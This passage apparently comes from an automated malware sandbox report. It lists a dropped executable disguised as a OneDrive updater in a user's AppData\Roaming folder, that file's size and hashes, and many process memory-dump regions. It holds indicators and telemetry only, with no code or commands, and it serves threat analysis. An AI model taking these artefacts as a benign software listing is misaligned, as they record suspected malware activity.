                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                            • \Users\Admin\AppData\Roaming\onedrive\updater.exe

                                              Filesize

                                              4.3MB

                                              MD5

                                              4f0dcfb8b8cf69bb60c7c051554f0fc5

                                              SHA1

                                              992f2bf6e63b6894c6f5311efa2cf908e50621d1

                                              SHA256

                                              06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130

                                              SHA512

                                              936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c

                                            • memory/276-70-0x0000000000000000-mapping.dmp

                                            • memory/292-133-0x0000000000000000-mapping.dmp

                                            • memory/300-66-0x0000000000000000-mapping.dmp

                                            • memory/316-100-0x0000000000000000-mapping.dmp

                                            • memory/468-136-0x0000000000000000-mapping.dmp

                                            • memory/552-83-0x0000000000000000-mapping.dmp

                                            • memory/568-82-0x0000000000000000-mapping.dmp

                                            • memory/584-68-0x0000000000000000-mapping.dmp

                                            • memory/604-126-0x0000000000000000-mapping.dmp

                                            • memory/672-71-0x0000000000000000-mapping.dmp

                                            • memory/672-137-0x0000000000000000-mapping.dmp

                                            • memory/752-131-0x0000000000000000-mapping.dmp

                                            • memory/752-94-0x0000000000000000-mapping.dmp

                                            • memory/764-128-0x0000000000000000-mapping.dmp

                                            • memory/788-134-0x0000000000000000-mapping.dmp

                                            • memory/800-118-0x0000000000000000-mapping.dmp

                                            • memory/824-78-0x0000000000000000-mapping.dmp

                                            • memory/852-67-0x0000000000000000-mapping.dmp

                                            • memory/852-95-0x0000000000000000-mapping.dmp

                                            • memory/880-77-0x0000000000000000-mapping.dmp

                                            • memory/884-116-0x0000000000000000-mapping.dmp

                                            • memory/936-85-0x0000000000000000-mapping.dmp

                                            • memory/936-120-0x0000000000000000-mapping.dmp

                                            • memory/940-125-0x0000000000000000-mapping.dmp

                                            • memory/944-144-0x0000000000000000-0x0000000001000000-memory.dmp

                                              Filesize

                                              16.0MB

                                            • memory/944-143-0x00000000000E0000-0x0000000000100000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/960-84-0x0000000000000000-mapping.dmp

                                            • memory/968-121-0x0000000000000000-mapping.dmp

                                            • memory/980-130-0x0000000000000000-mapping.dmp

                                            • memory/1144-132-0x0000000000000000-mapping.dmp

                                            • memory/1224-111-0x00000000026FB000-0x000000000271A000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/1224-107-0x000007FEED020000-0x000007FEEDA43000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/1224-110-0x00000000026F4000-0x00000000026F7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/1224-73-0x0000000000000000-mapping.dmp

                                            • memory/1224-109-0x00000000026F4000-0x00000000026F7000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/1224-108-0x000007FEEC4C0000-0x000007FEED01D000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/1224-104-0x0000000000000000-mapping.dmp

                                            • memory/1252-76-0x0000000000000000-mapping.dmp

                                            • memory/1268-63-0x0000000000000000-mapping.dmp

                                            • memory/1280-75-0x0000000000000000-mapping.dmp

                                            • memory/1300-90-0x0000000000000000-mapping.dmp

                                            • memory/1336-117-0x0000000000000000-mapping.dmp

                                            • memory/1468-92-0x0000000000000000-mapping.dmp

                                            • memory/1488-127-0x0000000000000000-mapping.dmp

                                            • memory/1492-129-0x0000000000000000-mapping.dmp

                                            • memory/1504-112-0x0000000000000000-mapping.dmp

                                            • memory/1536-124-0x0000000000000000-mapping.dmp

                                            • memory/1548-102-0x0000000000000000-mapping.dmp

                                            • memory/1552-74-0x0000000000000000-mapping.dmp

                                            • memory/1560-113-0x0000000000000000-mapping.dmp

                                            • memory/1564-88-0x0000000000000000-mapping.dmp

                                            • memory/1580-86-0x0000000000000000-mapping.dmp

                                            • memory/1608-119-0x0000000000000000-mapping.dmp

                                            • memory/1632-64-0x0000000000000000-mapping.dmp

                                            • memory/1636-80-0x0000000000000000-mapping.dmp

                                            • memory/1684-79-0x0000000000000000-mapping.dmp

                                            • memory/1688-87-0x0000000000000000-mapping.dmp

                                            • memory/1688-123-0x0000000000000000-mapping.dmp

                                            • memory/1692-91-0x0000000000000000-mapping.dmp

                                            • memory/1700-122-0x0000000000000000-mapping.dmp

                                            • memory/1740-61-0x0000000002764000-0x0000000002767000-memory.dmp

                                              Filesize

                                              12KB

                                            • memory/1740-60-0x000000001B760000-0x000000001BA5F000-memory.dmp

                                              Filesize

                                              3.0MB

                                            • memory/1740-62-0x000000000276B000-0x000000000278A000-memory.dmp

                                              Filesize

                                              124KB

                                            • memory/1740-59-0x000007FEECF10000-0x000007FEEDA6D000-memory.dmp

                                              Filesize

                                              11.4MB

                                            • memory/1740-58-0x000007FEEDA70000-0x000007FEEE493000-memory.dmp

                                              Filesize

                                              10.1MB

                                            • memory/1740-56-0x0000000000000000-mapping.dmp

                                            • memory/1748-89-0x0000000000000000-mapping.dmp

                                            • memory/1756-69-0x0000000000000000-mapping.dmp

                                            • memory/1760-135-0x0000000000000000-mapping.dmp

                                            • memory/1772-72-0x0000000000000000-mapping.dmp

                                            • memory/1776-141-0x0000000001BF0000-0x0000000001BFC000-memory.dmp

                                              Filesize

                                              48KB

                                            • memory/1776-140-0x0000000000060000-0x000000000006A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/1776-114-0x0000000000000000-mapping.dmp

                                            • memory/1868-115-0x0000000000000000-mapping.dmp

                                            • memory/1916-97-0x0000000000000000-mapping.dmp

                                            • memory/1916-139-0x0000000000690000-0x000000000069A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/1916-65-0x0000000000000000-mapping.dmp

                                            • memory/1916-101-0x0000000000A80000-0x0000000000ED2000-memory.dmp

                                              Filesize

                                              4.3MB

                                            • memory/1924-93-0x0000000000000000-mapping.dmp

                                            • memory/1944-81-0x0000000000000000-mapping.dmp

                                            • memory/1996-54-0x0000000000F00000-0x0000000001352000-memory.dmp

                                              Filesize

                                              4.3MB

                                            • memory/1996-55-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

                                              Filesize

                                              8KB